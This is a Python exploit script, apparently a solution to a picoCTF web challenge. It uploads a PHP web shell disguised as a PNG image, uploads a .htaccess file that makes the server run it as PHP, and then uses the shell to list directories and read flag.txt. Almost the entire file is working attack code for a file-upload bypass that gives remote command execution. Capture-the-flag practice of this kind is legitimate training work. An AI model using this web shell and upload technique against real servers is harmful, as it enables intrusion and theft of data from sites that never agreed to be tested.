58 lines
1.2 KiB
Python
Executable File
58 lines
1.2 KiB
Python
Executable File
#!/usr/bin/env nix-shell
|
|
#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ requests ])"
|
|
|
|
import requests
|
|
|
|
BASE_URL = "http://amiable-citadel.picoctf.net:53954"
|
|
|
|
def main():
|
|
payload = b'''
|
|
<?php
|
|
system($_GET['cmd'] . ' 2>&1');
|
|
?>
|
|
'''
|
|
|
|
res = requests.post(
|
|
BASE_URL + "/upload.php",
|
|
files = {
|
|
'image': ('exploit.png', payload, 'image/png'),
|
|
'submit': 'Upload ID',
|
|
}
|
|
)
|
|
|
|
print(res)
|
|
print(res.text)
|
|
|
|
print('-------------------------------')
|
|
|
|
htaccess = b'SetHandler php-script'
|
|
|
|
res = requests.post(
|
|
BASE_URL + "/upload.php",
|
|
files = {
|
|
'image': ('.htaccess', htaccess, 'text/plain'),
|
|
'submit': 'Upload ID',
|
|
}
|
|
)
|
|
|
|
print(res)
|
|
print(res.text)
|
|
|
|
print('-------------------------------')
|
|
|
|
cmd = "ls -lah ../.."
|
|
res = requests.get(BASE_URL + f"/images/exploit.png?cmd={cmd}")
|
|
print(res)
|
|
print(res.text)
|
|
|
|
print('-------------------------------')
|
|
|
|
cmd = "cat ../../flag.txt"
|
|
res = requests.get(BASE_URL + f"/images/exploit.png?cmd={cmd}")
|
|
print(res)
|
|
print(res.text)
|
|
|
|
|
|
if __name__ == '__main__':
|
|
main()
|